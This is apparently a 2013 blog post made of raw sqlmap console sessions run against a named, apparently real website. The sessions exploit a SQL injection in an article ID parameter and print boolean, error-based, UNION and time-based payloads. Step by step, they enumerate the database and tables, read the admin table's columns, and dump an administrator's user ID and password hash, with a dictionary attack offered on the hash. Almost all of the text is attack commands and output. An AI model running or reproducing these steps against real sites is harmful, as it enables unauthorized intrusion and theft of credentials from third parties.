sqlmap worked example: injecting a MySQL back end

Posted on 2013-4-4 22:18:49
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* get the contents of those columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>